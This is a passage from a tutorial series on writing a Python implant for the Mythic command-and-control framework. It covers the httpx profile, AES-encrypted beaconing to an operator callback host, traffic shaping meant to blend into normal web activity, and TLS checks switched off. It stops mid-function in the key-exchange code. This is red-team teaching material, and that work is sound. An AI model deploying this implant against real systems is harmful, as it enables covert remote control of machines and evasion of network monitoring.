27 min read

Building a Mythic C2 Agent in Python — Part 2: Batched Tasking, HTTPS, and the httpx Profile

Overview

Part 1 left us with a working but operationally naive agent. Three things need fixing before we can consider it even minimally production-ready:

  1. One task per beacon. The agent sends tasking_size: 1 and sleeps between every single task, even if Mythic has ten tasks queued. The Mythic docs explicitly describe a way to request all pending tasks and fold responses into the next tasking request to halve round trips.
  2. Plaintext traffic. HTTP with no encryption is only acceptable for debugging. We need TLS and Mythic-managed AES-256 PSK encryption.
  3. No request shaping. The http profile is fixed — the message always goes in the body of a POST. The httpx profile lets you put the agent message anywhere in the request and customise every header, making the traffic blend into legitimate-looking web activity.

This part addresses all three. We'll also properly explain what a C2 profile actually is before introducing the new one.


1. What is a C2 Profile?

Before switching profiles it is worth understanding what they actually are. Per the Mythic C2 development docs:

C2 profiles live in their own docker containers and act as a translation mechanism between whatever your special sauce C2 protocol is and what the back-end Mythic server understands (HTTP + JSON). Their entire role in life is to get data off the wire from whatever special communications format you're using and forward that to Mythic.

And from the C2 profiles operational docs:

There are two main pieces for every C2 profile: Server code — code that runs in a docker container to convert the C2 profile communication specification into the corresponding RESTful endpoints that Mythic uses. Agent code — the code that runs in a callback to implement the C2 profile on the target machine.

A C2 profile is a separate Docker container. Your agent talks to the C2 profile container; the profile container talks to Mythic. The agent never communicates with Mythic directly:

Agent  ──HTTP/S──▶  C2 Profile Container  ──RabbitMQ──▶  Mythic Backend
       ◀──────────                         ◀────────────

http vs httpx

http is "simple HTTP async comms using standard GET/POST requests." The message is always in the POST body. There is no configuration of where the message lives or how it is transformed.

httpx is "a more dynamic and configurable HTTP profile." Per the README it supports:

  • Message location in cookies, headers, query parameters, or body
  • Message transforms: base64, base64url, XOR, NetBIOS, prepend, append
  • Custom client/server headers
  • Multiple callback domains with rotation

The configuration is provided via a JSON file uploaded at build time. This file is a contract between two parties:

  1. The httpx server container reads it to know how to parse incoming requests and format outgoing responses
  2. The agent must independently implement the same contract — applying the same transforms, using the same URI, placing the message in the specified location

The agent does not read the file at runtime. The relevant values (URI, message location, transforms) are extracted from the file by builder.py at build time and stamped into the agent as constants.


2. The Malleable Profile Config File

The profile config schema is shown in Xenon's example profiles. The top-level structure is:

{
  "name": "Profile Name",
  "get": {
    "verb": "GET",
    "uris": ["/uri1", "/uri2"],
    "client": {
      "headers": { "User-Agent": "..." },
      "parameters": null,
      "message": {
        "location": "query",
        "name": "filter"
      },
      "transforms": [
        { "action": "base64url", "value": "" }
      ]
    },
    "server": {
      "headers": { "Content-Type": "application/json" },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/upload"],
    "client": {
      "headers": { "Content-Type": "application/json" },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}

Key fields:

  • name — required. The httpx container uses this to identify the profile variation. Omitting it produces Missing name for agent variation.
  • message.location — where the agent places the message: "body""query""header", or "cookie".
  • message.name — the query parameter, header, or cookie name when location is not "body".
  • client.transforms — transforms applied to the message before sending, in order.
  • server.transforms — transforms the agent applies in reverse to decode the server's response.
  • uris — array of URI paths. The agent selects from these per request.

Available transform actions per the httpx README: base64base64urlxorprependappendnetbiosnetbiosu.

The Profile for Part 2

Save this as pyrite_httpx.json before generating a payload. This uses the simplest possible transform (body + base64) to keep the agent straightforward while still correctly implementing the full pipeline:

{
  "name": "Pyrite",
  "get": {
    "verb": "GET",
    "uris": ["/"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  },
  "post": {
    "verb": "POST",
    "uris": ["/data"],
    "client": {
      "headers": {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
        "Content-Type": "application/octet-stream"
      },
      "parameters": null,
      "message": {
        "location": "body",
        "name": ""
      },
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    },
    "server": {
      "headers": {},
      "transforms": [
        { "action": "base64", "value": "" }
      ]
    }
  }
}

3. Install httpx and pycryptodome

sudo ./mythic-cli install github https://github.com/MythicC2Profiles/httpx

Also update pyrite/Dockerfile to install pycryptodome — the agent uses it for AES-256-CBC encryption:

FROM itsafeaturemythic/mythic_python_base:latest

WORKDIR /Mythic/

RUN pip install requests pycryptodome

CMD ["python3", "main.py"]

pycryptodome must also be available on the target machine where the agent runs. If the target is a controlled lab host, install it with pip install pycryptodome. For targets where you cannot guarantee it is available, use AESPSK = none (plaintext mode). A production agent would bundle the AES implementation — Part 3 addresses this when we implement a custom protocol.


4. builder.py — Full Updated Version

File: pyrite/mythic/agent_functions/builder.py This file runs inside the Mythic container. It must contain only the Pyrite(PayloadType) class. It must not contain any REPLACE_* tokens — those belong exclusively in pyrite/agent_code/pyrite_agent.py. If builder.py contains REPLACE_* tokens, Python will throw a NameError when importing the container because those tokens are not valid Python identifiers.

The mythic/agent_functions/ layout follows the Medusa convention established in Part 1. All server-side container code lives under pyrite/mythic/; implant code lives under pyrite/agent_code/.
# pyrite/mythic/agent_functions/builder.py
import logging
import pathlib
import json

from mythic_container.PayloadBuilder import *
from mythic_container.MythicCommandBase import *
from mythic_container.MythicRPC import *


class Pyrite(PayloadType):
    name = "pyrite"
    file_extension = "py"
    author = "@yourhandle"
    supported_os = [SupportedOS.Linux, SupportedOS.Windows, SupportedOS.MacOS]
    wrapper = False
    wrapped_payloads = []
    note = "Simple Python3 agent for demonstrating Mythic agent development."
    supports_dynamic_loading = True
    mythic_encrypts = True
    translation_container = None

    c2_profiles = ["httpx"]     # Part 2: httpx only

    build_parameters = [
        BuildParameter(
            name="version",
            parameter_type=BuildParameterType.String,
            description="Agent version string",
            default_value="0.1.0",
            required=False,
        ),
    ]

    agent_path      = pathlib.Path(".") / "pyrite"
    agent_icon_path = agent_path / "mythic" / "agent_functions" / "pyrite.svg"
    agent_code_path = agent_path / "agent_code"

    build_steps = [
        BuildStep(
            step_name="Gathering Files",
            step_description="Reading agent template and command files from disk",
        ),
        BuildStep(
            step_name="Configuring",
            step_description="Stamping C2 parameters into the agent source",
        ),
    ]

    async def build(self) -> BuildResponse:
        resp = BuildResponse(status=BuildStatus.Success)

        # ── Step 1: Read template and command files ────────────────────────
        try:
            agent_source = open(self.agent_code_path / "pyrite_agent.py", "r").read()

            command_code = ""
            for cmd in self.commands.get_commands():
                try:
                    command_code += open(self.agent_code_path / f"{cmd}.py", "r").read() + "\n"
                except FileNotFoundError:
                    pass

            agent_source = agent_source.replace(
                "# ##COMMAND_CODE_INSERT##",
                command_code
            )

            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout="Read agent template and command files successfully",
                    StepSuccess=True,
                )
            )
        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Gathering Files",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Failed to read agent template: {e}"
            return resp

        # ── Step 2: Extract parameters and stamp into agent ────────────────
        try:
            if len(self.c2info) != 1:
                raise ValueError(f"Expected 1 C2 profile, got {len(self.c2info)}")

            params = self.c2info[0].get_parameters_dict()

            # ── AESPSK ─────────────────────────────────────────────────────
            # AESPSK is a C2 profile parameter with crypto_type=True.
            # When operator selects "aes256_hmac", Mythic auto-generates a
            # 32-byte per-payload AES key and returns it as a dict.
            # When "none" is selected, no key is generated.
            # Per the Mythic checkin docs, Mythic looks up this key by
            # PayloadUUID to know how to decrypt incoming agent messages.
            aespsk_raw = params.get("AESPSK")
            if isinstance(aespsk_raw, dict):
                aespsk = aespsk_raw.get("enc_key") or ""
            elif aespsk_raw:
                aespsk = str(aespsk_raw)
            else:
                aespsk = ""

            # ── encrypted_exchange_check ────────────────────────────────────
            # Boolean C2 profile parameter defined by httpx. Controls whether
            # the agent performs RSA EKE (staging_rsa exchange) before checkin.
            # True + AESPSK set  → EKE: use AESPSK only for staging exchange,
            #                      then use negotiated session key for all traffic
            # False + AESPSK set → Static PSK: use AESPSK for all traffic directly
            # False + no AESPSK  → Plaintext: no encryption
            eke_raw = params.get("encrypted_exchange_check", False)
            if isinstance(eke_raw, str):
                eke_enabled = eke_raw.lower() in ("true", "t", "1", "yes")
            else:
                eke_enabled = bool(eke_raw)
            use_eke = eke_enabled and bool(aespsk)

            # ── Callback domains ───────────────────────────────────────────
            # httpx uses callback_domains (array of full URLs).
            # Mythic may return it as a Python list or as a JSON array string.
            callback_domains = params.get("callback_domains", ["http://127.0.0.1:80"])
            if isinstance(callback_domains, str):
                # Try to parse as JSON array e.g. '["http://127.0.0.1:82"]'
                try:
                    callback_domains = json.loads(callback_domains)
                except Exception:
                    callback_domains = [callback_domains]
            if isinstance(callback_domains, list) and callback_domains:
                first_domain = str(callback_domains[0]).strip()
            else:
                first_domain = str(callback_domains).strip()

            # Parse scheme://host:port
            # e.g. "http://127.0.0.1:82" → host="http://127.0.0.1", port="82"
            import re
            domain_match = re.match(r'^(https?://[^:/]+):(\d+)/?$', first_domain)
            if domain_match:
                callback_host = domain_match.group(1)
                callback_port = domain_match.group(2)
            else:
                # No explicit port — use scheme default
                callback_host = first_domain.rstrip("/")
                callback_port = "443" if first_domain.startswith("https") else "80"

            # ── Parse the uploaded malleable profile config file ────────────
            # The correct parameter key is "raw_c2_config".
            # It contains the JSON/TOML profile config file contents as a string.
            profile_config = {}
            raw_config = params.get("raw_c2_config")
            if raw_config:
                if isinstance(raw_config, str) and len(raw_config) == 36:
                    # It's a file UUID — fetch contents via MythicRPC
                    file_resp = await SendMythicRPCFileGetContent(
                        MythicRPCFileGetContentMessage(AgentFileId=raw_config)
                    )
                    if file_resp.Success:
                        profile_config = json.loads(file_resp.Content)
                elif isinstance(raw_config, str):
                    profile_config = json.loads(raw_config)
                elif isinstance(raw_config, dict):
                    profile_config = raw_config

            # ── Extract values from the profile config ──────────────────────
            # POST block — used for checkin and post_response
            post_block        = profile_config.get("post", {})
            post_client       = post_block.get("client", {})
            post_msg          = post_client.get("message", {})
            post_server       = post_block.get("server", {})

            post_uris         = post_block.get("uris", ["/data"])
            post_uris_json    = json.dumps(post_uris)
            post_uri          = post_uris[0] if post_uris else "/data"  # kept for fallback
            post_msg_loc      = post_msg.get("location", "body")
            post_msg_name     = post_msg.get("name", "")
            post_transforms   = json.dumps(post_client.get("transforms", []))
            post_srv_xforms   = json.dumps(post_server.get("transforms", []))
            post_headers      = json.dumps(post_client.get("headers", {}))

            # GET block — used for get_tasking
            get_block         = profile_config.get("get", {})
            get_client        = get_block.get("client", {})
            get_msg           = get_client.get("message", {})
            get_server        = get_block.get("server", {})

            get_uris          = get_block.get("uris", ["/"])
            get_uris_json     = json.dumps(get_uris)
            get_uri           = get_uris[0] if get_uris else "/"  # kept for fallback
            get_msg_loc       = get_msg.get("location", "body")
            get_msg_name      = get_msg.get("name", "")
            get_transforms    = json.dumps(get_client.get("transforms", []))
            get_srv_xforms    = json.dumps(get_server.get("transforms", []))
            get_headers       = json.dumps(get_client.get("headers", {}))

            # ── Build replacements dict ─────────────────────────────────────
            # Every value must be a str — params.get() can return None for
            # optional fields and str.replace() will raise if given None.
            def s(val, default=""):
                return str(val) if val is not None else default

            replacements = {
                "REPLACE_CALLBACK_HOST":          callback_host,
                "REPLACE_CALLBACK_PORT":          callback_port,
                "REPLACE_CALLBACK_INTERVAL":      s(params.get("callback_interval"), "10"),
                "REPLACE_CALLBACK_JITTER":        s(params.get("callback_jitter"), "23"),
                "REPLACE_PAYLOAD_UUID":           str(self.uuid),
                "REPLACE_AESPSK":                 aespsk,
                "REPLACE_KILL_DATE":              s(params.get("killdate"), ""),
                "REPLACE_USE_EKE":                str(use_eke),
                # POST profile values
                "REPLACE_POST_URIS":              post_uris_json,   # list literal
                "REPLACE_POST_URI":               post_uri,
                "REPLACE_POST_MSG_LOC":           post_msg_loc,
                "REPLACE_POST_MSG_NAME":          post_msg_name,
                "REPLACE_POST_TRANSFORMS":        post_transforms,
                "REPLACE_POST_SERVER_TRANSFORMS": post_srv_xforms,
                "REPLACE_POST_HEADERS":           post_headers,
                # GET profile values
                "REPLACE_GET_URIS":               get_uris_json,    # list literal
                "REPLACE_GET_URI":                get_uri,
                "REPLACE_GET_MSG_LOC":            get_msg_loc,
                "REPLACE_GET_MSG_NAME":           get_msg_name,
                "REPLACE_GET_TRANSFORMS":         get_transforms,
                "REPLACE_GET_SERVER_TRANSFORMS":  get_srv_xforms,
                "REPLACE_GET_HEADERS":            get_headers,
            }

            for token, value in replacements.items():
                agent_source = agent_source.replace(token, value)

            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout="Stamped all C2 parameters into agent source",
                    StepSuccess=True,
                )
            )
            resp.payload = agent_source.encode()
            resp.build_message = "Pyrite built successfully."

        except Exception as e:
            await SendMythicRPCPayloadUpdatebuildStep(
                MythicRPCPayloadUpdateBuildStepMessage(
                    PayloadUUID=self.uuid,
                    StepName="Configuring",
                    StepStdout=str(e),
                    StepSuccess=False,
                )
            )
            resp.set_status(BuildStatus.Error)
            resp.build_stderr = f"Configuration failed: {e}"

        return resp

5. Understanding mythic_encryptsAESPSK, and encrypted_exchange_check

mythic_encrypts

mythic_encrypts = True in builder.py is a developer declaration — it tells Mythic that the agent implements the AES-256-CBC + HMAC-SHA256 encryption itself. The C2 profile container is a transparent forwarder. The agent encrypts, Mythic's backend decrypts.

AESPSK — the encryption key parameter

AESPSK is a C2 profile parameter with crypto_type=True. Per the Mythic checkin docs:

When creating payloads, you can generate encryption keys per C2 profile. To do so, the C2 Profile will have a parameter that has an attribute called crypto_type=True. This will then signal to Mythic to either generate a new per-payload AES256_HMAC key... In the http profile for example, this is a ChooseOne option between aes256_hmac or none.

When aes256_hmac is selected, Mythic auto-generates a 32-byte per-payload AES key and returns it in params["AESPSK"] as {"enc_key":"...","dec_key":"...","value":"aes256_hmac"}. The builder stamps this key into the agent as AESPSK. Mythic also stores it server-side and uses the outer UUID to look it up when decrypting inbound messages.

When none is selected, no key is generated and AESPSK is empty.

encrypted_exchange_check — EKE toggle

encrypted_exchange_check is a boolean parameter defined by the C2 profile — both http and httpx include it. It is not a Mythic core concept (the Mythic docs do not mention it by name), but it is a de facto convention across multiple profiles. It controls whether the agent performs RSA EKE before the static-PSK checkin.

The combination matrix:

AESPSKencrypted_exchange_checkWhat the agent does
noneeitherPlaintext checkin — no key exists, EKE is impossible regardless of this flag
aes256_hmacfalseStatic PSK — use the stamped-in AESPSK to encrypt all traffic directly, no EKE staging
aes256_hmactrueEKE — use AESPSK only for the staging_rsa exchange to negotiate a per-session key, then use that session key for all subsequent traffic

The key difference between static PSK and EKE: with static PSK, the embedded key is used for every callback from that payload — anyone who extracts the binary can decrypt all traffic. With EKE, the embedded key only protects the staging exchange; session traffic uses a unique key negotiated at runtime that never touches disk.

The builder computes USE_EKE = encrypted_exchange_check AND AESPSK_is_set and stamps it into the agent as REPLACE_USE_EKEdo_checkin branches on USE_EKE.

Wire format

Regardless of which path is taken, the message format follows the Mythic spec. With encryption active:

Base64( UUID(36) + IV(16) + AES-CBC(JSON body) + HMAC-SHA256(IV + ciphertext) )

Without encryption:

Base64( UUID(36) + JSON body )

6. The Full Agent Template — pyrite_agent.py

File: pyrite/agent_code/pyrite_agent.py This file is the implant template. It is read as a text file by builder.py at build time — it is never imported by Python directly. The REPLACE_* tokens are plain text substitution markers, not Python variables. Do not put this code in mythic/agent_functions/builder.py.
Replace the file entirely. The agent from Part 1 has no AES implementation — it will stamp in the AESPSK key but never use it, sending plaintext regardless of what the operator selects. Delete the old file and replace it with the version below.

Also update the stale comment in builder.py Step 2 — replace the old comment block for AESPSK with:

# ── AESPSK ─────────────────────────────────────────────────────
# The agent uses this key to encrypt every message body.
# "aes256_hmac" → Mythic returns {"enc_key": "...", "dec_key": "...", "value": "aes256_hmac"}
# "none"        → stamp empty string, agent sends plaintext

This is the complete rewrite of the agent for httpx. All profile values are stamped in as constants at build time. The agent implements the full transform pipeline and AES-256-CBC + HMAC-SHA256 encryption.

Note the token format for list and dict values: they are written without quotes in the template because the builder substitutes them with Python literal values via json.dumps():

# In template — no quotes:
GET_TRANSFORMS = REPLACE_GET_TRANSFORMS

# After builder substitution — valid Python literal:
GET_TRANSFORMS = [{"action": "base64", "value": ""}]
#!/usr/bin/env python3
"""
pyrite_agent.py — Pyrite implant for Mythic C2 (Part 2: httpx)

THIS IS A TEMPLATE. All REPLACE_* tokens are substituted at build time
by builder.py. Do not replace them with real values here.
"""

import base64
import datetime
import json
import os
import platform
import random
import socket
import subprocess
import sys
import time
import traceback

try:
    import requests
    from requests.packages.urllib3.exceptions import InsecureRequestWarning
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
except ImportError:
    import urllib.request
    import urllib.error
    requests = None

# ── Configuration stamped in by builder.py ────────────────────────────────────
CALLBACK_HOST     = "REPLACE_CALLBACK_HOST"
CALLBACK_PORT     = REPLACE_CALLBACK_PORT
CALLBACK_INTERVAL = REPLACE_CALLBACK_INTERVAL
CALLBACK_JITTER   = REPLACE_CALLBACK_JITTER
PAYLOAD_UUID      = "REPLACE_PAYLOAD_UUID"
AESPSK            = "REPLACE_AESPSK"
KILL_DATE_STR     = "REPLACE_KILL_DATE"
USE_EKE           = REPLACE_USE_EKE      # True if encrypted_exchange_check=true AND AESPSK set

# ── Profile-derived values stamped in by builder.py ───────────────────────────
# These come from the uploaded malleable profile config file.
# List and dict tokens are substituted WITHOUT quotes — they become
# Python literal values directly (e.g. [{"action": "base64", "value": ""}]).

POST_URIS                = REPLACE_POST_URIS
POST_URI                 = "REPLACE_POST_URI"
POST_MSG_LOC             = "REPLACE_POST_MSG_LOC"
POST_MSG_NAME            = "REPLACE_POST_MSG_NAME"
POST_TRANSFORMS          = REPLACE_POST_TRANSFORMS
POST_SERVER_TRANSFORMS   = REPLACE_POST_SERVER_TRANSFORMS
POST_HDRS                = REPLACE_POST_HEADERS

GET_URIS                 = REPLACE_GET_URIS
GET_URI                  = "REPLACE_GET_URI"
GET_MSG_LOC              = "REPLACE_GET_MSG_LOC"
GET_MSG_NAME             = "REPLACE_GET_MSG_NAME"
GET_TRANSFORMS           = REPLACE_GET_TRANSFORMS
GET_SERVER_TRANSFORMS    = REPLACE_GET_SERVER_TRANSFORMS
GET_HDRS                 = REPLACE_GET_HEADERS

# ── Globals ────────────────────────────────────────────────────────────────────
CALLBACK_UUID      = None
SESSION_KEY        = None   # negotiated AES key after EKE staging — replaces AESPSK
BASE_URL           = f"{CALLBACK_HOST}:{CALLBACK_PORT}"
_pending_responses = []


# ─────────────────────────────────────────────────────────────────────────────
# AES-256-CBC + HMAC-SHA256 Encryption
# ─────────────────────────────────────────────────────────────────────────────
# Per the Mythic agent message format docs:
#   https://docs.mythic-c2.net/customizing/payload-type-development/
#           create_tasking/agent-side-coding/initial-checkin
#
# Wire format when AESPSK is set:
#   Base64( UUID(36) + IV(16) + AES-CBC(JSON) + HMAC-SHA256(IV + ciphertext) )
#
# AES details (from docs):
#   Mode:    CBC
#   Padding: PKCS7, block size 16
#   IV:      16 random bytes, fresh per message
#   HMAC:    SHA256 over (IV + ciphertext) using the same AES key, appended after ciphertext
#
# Uses pycryptodome if available, falls back to pyca/cryptography.
# Add to Dockerfile: RUN pip install pycryptodome

import hashlib
import hmac as _hmac_mod

try:
    from Crypto.Cipher import AES as _AES
    from Crypto.Util.Padding import pad as _pad, unpad as _unpad
    _CRYPTO_LIB = "pycryptodome"
except ImportError:
    try:
        from cryptography.hazmat.primitives.ciphers import Cipher as _Cipher
        from cryptography.hazmat.primitives.ciphers.algorithms import AES as _AESAlgo
        from cryptography.hazmat.primitives.ciphers.modes import CBC as _CBC
        from cryptography.hazmat.primitives import padding as _padding
        _CRYPTO_LIB = "cryptography"
    except ImportError:
        _CRYPTO_LIB = None


def mythic_encrypt(plaintext_json: bytes, aes_key_b64: str) -> bytes:
    """
    Encrypt a JSON body per the Mythic static-encryption spec.
    Returns: IV(16) + AES-CBC(padded plaintext) + HMAC-SHA256(IV + ciphertext)
    The UUID prefix is NOT included here — it is prepended in send_message.
    """
    key = base64.b64decode(aes_key_b64)
    iv  = os.urandom(16)

    if _CRYPTO_LIB == "pycryptodome":
        cipher     = _AES.new(key, _AES.MODE_CBC, iv)
        padded     = _pad(plaintext_json, 16)
        ciphertext = cipher.encrypt(padded)
    elif _CRYPTO_LIB == "cryptography":
        padder     = _padding.PKCS7(128).padder()
        padded     = padder.update(plaintext_json) + padder.finalize()
        cipher     = _Cipher(_AESAlgo(key), _CBC(iv))
        encryptor  = cipher.encryptor()
        ciphertext = encryptor.update(padded) + encryptor.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")

    mac = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
    return iv + ciphertext + mac


def mythic_decrypt(data: bytes, aes_key_b64: str) -> bytes:
    """
    Decrypt a Mythic-format encrypted blob.
    data = IV(16) + ciphertext + HMAC-SHA256(32)
    Verifies HMAC before decrypting. Returns plaintext JSON bytes.
    """
    key        = base64.b64decode(aes_key_b64)
    iv         = data[:16]
    mac        = data[-32:]
    ciphertext = data[16:-32]

    expected = _hmac_mod.new(key, iv + ciphertext, hashlib.sha256).digest()
    if not _hmac_mod.compare_digest(mac, expected):
        raise ValueError("HMAC verification failed — message may be tampered or key is wrong")

    if _CRYPTO_LIB == "pycryptodome":
        cipher = _AES.new(key, _AES.MODE_CBC, iv)
        padded = cipher.decrypt(ciphertext)
        return _unpad(padded, 16)
    elif _CRYPTO_LIB == "cryptography":
        cipher    = _Cipher(_AESAlgo(key), _CBC(iv))
        decryptor = cipher.decryptor()
        padded    = decryptor.update(ciphertext) + decryptor.finalize()
        unpadder  = _padding.PKCS7(128).unpadder()
        return unpadder.update(padded) + unpadder.finalize()
    else:
        raise RuntimeError("No AES library available. Install pycryptodome.")


# ─────────────────────────────────────────────────────────────────────────────
# Transform Pipeline
# ─────────────────────────────────────────────────────────────────────────────

def apply_transforms(data: bytes, transforms: list) -> bytes:
    """
    Apply a list of transforms in order to data before sending.
    Each transform is {"action": "...", "value": "..."}.
    Available actions per the httpx README:
      base64, base64url, xor, prepend, append, netbios, netbiosu
    """
    for t in transforms:
        action = t.get("action", "")
        value  = t.get("value", "")
        if action == "base64":
            data = base64.b64encode(data)
        elif action == "base64url":
            # Keep '=' padding — the httpx Go container uses base64.URLEncoding
            # which requires padding. Stripping '=' causes "illegal base64 data"
            # errors when the encoded length is not a multiple of 4.
            data = base64.urlsafe_b64encode(data)
        elif action == "prepend":
            data = value.encode("utf-8") + data
        elif action == "append":
            data = data + value.encode("utf-8")
        elif action == "xor":
            key  = value.encode("utf-8")
            data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action == "netbios":
            result = b""
            for byte in data:
                result += bytes([ord('a') + (byte >> 4), ord('a') + (byte & 0xf)])
            data = result
        elif action == "netbiosu":
            result = b""
            for byte in data:
                result += bytes([ord('A') + (byte >> 4), ord('A') + (byte & 0xf)])
            data = result
    return data


def reverse_transforms(data: bytes, transforms: list) -> bytes:
    """
    Reverse a list of transforms in reverse order to decode a server response.
    """
    for t in reversed(transforms):
        action = t.get("action", "")
        value  = t.get("value", "")
        if action == "base64":
            data = base64.b64decode(data)
        elif action == "base64url":
            pad  = (4 - len(data) % 4) % 4
            data = base64.urlsafe_b64decode(data + b"=" * pad)
        elif action == "prepend":
            data = data[len(value.encode("utf-8")):]
        elif action == "append":
            data = data[:-len(value.encode("utf-8"))]
        elif action == "xor":
            key  = value.encode("utf-8")
            data = bytes(b ^ key[i % len(key)] for i, b in enumerate(data))
        elif action in ("netbios", "netbiosu"):
            result = b""
            base   = ord('a') if action == "netbios" else ord('A')
            for i in range(0, len(data), 2):
                high = data[i] - base
                low  = data[i + 1] - base
                result += bytes([(high << 4) | low])
            data = result
    return data


# ─────────────────────────────────────────────────────────────────────────────
# HTTP Transport
# ─────────────────────────────────────────────────────────────────────────────

def _place_message(method: str, url: str, encoded: bytes,
                   msg_loc: str, msg_name: str, extra_headers: dict) -> bytes:
    """
    Send the encoded message using the HTTP method, URL, and placement
    location specified in the profile config.
    Returns the raw response bytes.
    """
    headers = dict(extra_headers)

    if requests:
        if msg_loc == "body":
            if method == "GET":
                r = requests.get(url, data=encoded, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, data=encoded, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "query":
            # Build the URL manually to avoid requests URL-encoding the value.
            # requests' params= dict would encode '+' as '%2B', breaking base64
            # in the query string. Our encoded value is already URL-safe (the
            # profile should use base64url for query placement, not base64).
            sep      = "&" if "?" in url else "?"
            full_url = f"{url}{sep}{msg_name}={encoded.decode('utf-8')}"
            if method == "GET":
                r = requests.get(full_url, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(full_url, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "header":
            headers[msg_name] = encoded.decode("utf-8")
            if method == "GET":
                r = requests.get(url, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, headers=headers,
                                  verify=False, timeout=30)

        elif msg_loc == "cookie":
            cookies = {msg_name: encoded.decode("utf-8")}
            if method == "GET":
                r = requests.get(url, cookies=cookies, headers=headers,
                                 verify=False, timeout=30)
            else:
                r = requests.post(url, cookies=cookies, headers=headers,
                                  verify=False, timeout=30)
        else:
            raise ValueError(f"Unknown message location: {msg_loc}")

        return r.content

    else:
        # urllib fallback — body placement only
        req = urllib.request.Request(
            url, data=encoded, headers=headers, method=method
        )
        with urllib.request.urlopen(req, timeout=30) as r:
            return r.read()


def send_message(uuid_str: str, payload: dict, use_get: bool = False,
                 override_key: str = None) -> dict:
    """
    Full send/receive cycle. Encrypts with SESSION_KEY if established (post-EKE),
    falls back to AESPSK (staging phase), then plaintext.
    override_key allows staging to specify which key to use explicitly.
    """
    active_key = override_key or SESSION_KEY or AESPSK

    json_body = json.dumps(payload).encode("utf-8")

    if active_key:
        body = mythic_encrypt(json_body, active_key)
    else:
        body = json_body

    raw  = uuid_str.encode("utf-8") + body
    wire = base64.b64encode(raw)

    if use_get:
        encoded  = apply_transforms(wire, GET_TRANSFORMS)
        url      = f"{BASE_URL}{random.choice(GET_URIS)}"
        method   = "GET"
        msg_loc, msg_name, hdrs = GET_MSG_LOC, GET_MSG_NAME, GET_HDRS
        s_xforms = GET_SERVER_TRANSFORMS
    else:
        encoded  = apply_transforms(wire, POST_TRANSFORMS)
        url      = f"{BASE_URL}{random.choice(POST_URIS)}"
        method   = "POST"
        msg_loc, msg_name, hdrs = POST_MSG_LOC, POST_MSG_NAME, POST_HDRS
        s_xforms = POST_SERVER_TRANSFORMS

    # ── DEBUG ─────────────────────────────────────────────────────────────────
    key_label = (
        f"EKE session  ({SESSION_KEY[:16]}...)" if SESSION_KEY and not override_key else
        f"override key ({override_key[:16]}...)" if override_key else
        f"static PSK   ({AESPSK[:16]}...)"      if AESPSK else
        "plaintext"
    )
    print(f"\n[DEBUG] OUTGOING ({method} {url})")
    print(f"  action    : {payload.get('action', '?')}")
    print(f"  outer UUID: {uuid_str}")
    print(f"  key used  : {key_label}")
    print(f"  raw[:60]  : {raw[:60]}...")
    print(f"  wire[:60] : {wire[:60]}...")
    print(f"  encoded head (20): {encoded[:20]}")
    print(f"  encoded tail (20): {encoded[-20:]}", flush=True)
    # ── END DEBUG ─────────────────────────────────────────────────────────────

    raw_resp = _place_message(method, url, encoded, msg_loc, msg_name, hdrs)
    decoded  = reverse_transforms(raw_resp, s_xforms)

    print(f"[DEBUG] INCOMING: {raw_resp[:60]}...", flush=True)

    unwrapped = base64.b64decode(decoded + b'====')
    resp_body = unwrapped[36:]

    if not resp_body:
        raise RuntimeError(
            f"Empty response body from {url} — check C2 container logs: "
            "sudo ./mythic-cli logs httpx"
        )

    if active_key:
        resp_body = mythic_decrypt(resp_body, active_key)

    return json.loads(resp_body)


# ─────────────────────────────────────────────────────────────────────────────
# Kill Date
# ─────────────────────────────────────────────────────────────────────────────

def check_kill_date() -> None:
    if not KILL_DATE_STR:
        return
    try:
        if datetime.date.today() >= datetime.date.fromisoformat(KILL_DATE_STR):
            os._exit(0)
    except ValueError:
        pass


# ─────────────────────────────────────────────────────────────────────────────
# EKE Staging + Checkin
# ─────────────────────────────────────────────────────────────────────────────

def get_ip() -> str:
    try:
        return socket.gethostbyname(socket.gethostname())
    except Exception:
        return "127.0.0.1"


def _gen_session_id(length: int = 20) -> str:
    import string
    chars = string.ascii_letters + string.digits
    return "".join(random.choice(chars) for _ in range(length))


def do_staging_rsa() -> tuple:
    """
    Perform RSA-based Encrypted Key Exchange with Mythic.

    Per the Mythic checkin docs:
      https://docs.mythic-c2.net/customizing/payload-type-development/
              create_tasking/agent-side-coding/initial-checkin
              #eke-by-generating-client-side-rsa-keys

    Phase 1 — Agent sends to Mythic (encrypted with static AESPSK):
      Base64( PayloadUUID + AES256(AESPSK, {"action":"staging_rsa",
              "pub_key":"<b64 RSA PEM>", "session_id":"<20char>"}) )

